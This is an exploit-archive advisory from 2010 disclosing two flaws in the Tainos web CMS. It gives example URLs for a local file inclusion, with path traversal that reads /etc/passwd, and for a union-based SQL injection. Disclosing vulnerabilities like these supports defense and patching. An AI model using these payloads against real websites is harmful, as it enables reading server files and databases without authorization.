[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Tainos Multiple Vulnerabilities
# Published : 2010-05-16
# Author : XroGuE
# Previous Title : EgO v0.7b (fckeditor) Remote File Upload
# Next Title : I-Vision CMS XSS, SQL injection vulnerability
=======================================================
Tainos Multiple Vulnerabilities
=======================================================
########################################
# Name: Tainos Multiple Vulnerabilities
# Vendor: www.tainos-webdesign.com
# Date: 2010/05/16
# Author: Ashiyane Digital Security Team
# Discovered: XroGuE
# Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members
# Contact: Xrogue_p3rsi4n_hack3r@Hotmail.com
########################################
########################################
[+] Local File Include Vulnerability:
[+] Vulnerability: www.Site.com/[path]/Page.php?page=[LFI]
[+] Example: http://[site]/index_offer.php?page=../../../../../../../../../../etc/passwd
[+] Example: http://[site]/nederlands/tours.php?page=../../../../../../../../../../etc/passwd
########################################
########################################
[+] SQL Injection Vulnerability:
[+] Vulnerability: /www.site.com/index.php?id=[SQLi]
[+] Example: http://[site]/index.php?id=-9999+union+all+select+1,2,@@version,4,5
########################################